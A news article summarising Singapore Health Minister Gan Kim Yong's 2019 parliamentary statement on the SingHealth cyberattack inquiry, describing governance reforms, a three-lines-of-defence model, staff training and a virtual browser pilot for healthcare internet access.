Singapore’s Minister for Health outlines key responses to COI report’s recommendations
Minister for Health Gan Kim Yong delivered a ministerial statement on the Committee of Inquiry (COI) report on the SingHealth cyberattack in the Singapore Parliament on January 15 2019. In the statement, he said that the Ministry of Health (MOH) has appointed a Cybersecurity Advisory Committee to conduct a horizontal review of the cybersecurity governance structures and processes across the public healthcare clusters and Integrated Health Information Systems (IHiS), the IT agency for the Ministry.
He also outlined four key responses to the COI report’s recommendations. The first is enhancing governance and organisational structures as there is a “need for clearer cybersecurity risk ownership and accountability between IHiS and the public healthcare clusters, underpinned by a strong relationship to avoid fragmenting the Ministry’s healthcare IT strategy.”
At MOH, the Chief Information Security Officer (CISO) is currently also the Director of Cyber Security Governance at IHiS but these roles will be separated. The MOH CISO will be supported by a dedicated office in MOH and report to the Permanent Secretary. The MOH CISO office will be the cybersecurity sector lead for the healthcare sector. It will coordinate efforts to protect Critical Information Infrastructure in the healthcare sector, and ensure that the sector fulfils its regulatory obligations under the Cybersecurity Act. For its part, IHiS will have its own separate Director of Cyber Security Governance.
At the clusters, the cluster Group CIO office will now be made fully accountable to the respective cluster management and Boards. The GCIO office will be adequately resourced to carry out its role. The position of the Cluster Information Security Officer will be elevated to report directly to cluster management, and be accountable to the IT and Risk Management Committees of the cluster Boards.
Secondly, a cybersecurity model with multiple lines of defence will be put in place. A more robust ‘Three Lines of Defence’ structure within the public healthcare:
- The first line comprises units and personnel who develop, deliver and operate the IT systems. This is the Delivery Group. MOH will strengthen the IT delivery group to better integrate cybersecurity into IT delivery initiatives, improve the management of network security, and increase emphasis on security architecture and monitoring.
- The second line of defence comprises units and personnel who have the specific responsibility to oversee security strategy, risk management and compliance. MOH will strengthen and elevate this second line of defence by establishing a dedicated Cyber Defence Group in IHiS headed by a senior leader at or equivalent to the Deputy Chief Executive level. The strengthened group will have independent oversight of cybersecurity implementation, compliance and risk management, and will oversee incident reporting and management. This will ensure that cybersecurity is managed at the senior management level, and an appropriate balance is struck between service delivery and cybersecurity considerations.
- The third line of defence comprises checks and assurances independent of IHiS and our healthcare clusters, and independent of the first two lines of defence. MOH Holdings Group Internal Audit will continue to play this role. MOH also intends to commission and tap on independent third parties where appropriate.
The third aspect would be improving the cybersecurity awareness and capacity of staff. Starting this year, IHiS will engage specialist providers to conduct realistic hands-on “Cyber Range” simulation training to raise the competence of their security incident response personnel. IHiS also intends to learn from GovTech’s bug bounty and vulnerability disclosure programmes and start similar efforts.
Lastly, a tiered model of Internet access will be considered. In its report, the COI has recommended that an internet access strategy which minimises exposure to external threats should be implemented. Following the cyberattack, temporary Internet Surfing Separation (ISS) was implemented across Singapore’s public healthcare sector.
However, the implementation of the ISS has posed several challenges in the provision of patient care in some areas such as emergency care, decision-support for prescriptions and treatments, access to patient education resources, and booking of clinical appointments. ISS also caused delays to frontline patient management and backend administrative tasks. Research and education initiatives in the public healthcare institutions have also been impacted by ISS.
The current model of ISS is still workable but there needs to be longer-term solutions that are more efficient and sustainable. One such solution is the “virtual browser”, which allows access to the Internet through strictly controlled and monitored client servers. The client server acts like a decontamination room in which a file is opened and only an image/copy of the file is taken and sent to the recipient. In this manner, any malicious material or hidden content is ‘left behind’ in the decontamination room, greatly reducing cybersecurity risks.
This “virtual browser” pilot will begin in the first quarter in 2019 at the National University Health System. “Virtual browsers” will be deployed in selected job functions at selected departments and clinics. Some of the job roles participating in the pilot include frontline pharmacists, and emergency department clinicians.
The conduct and evaluation of the pilot is expected to take about 6 months and MOH will closely with the Cybersecurity Agency of Singapore (CSA) to assess the cybersecurity adequacy of the solution. The effectiveness of the Virtual Brower will also be assessed.
Mandatory contributions to the National Electronic Health Record (NEHR) system will continue to be deferred as it is undergoing a series of cybersecurity assessments conducted by the CSA, GovTech, and independent firm PwC. The NEHR will also be subject to further testing and reviews, including exercises to test its defences against targeted attacks, as well as business continuity and disaster recovery plans.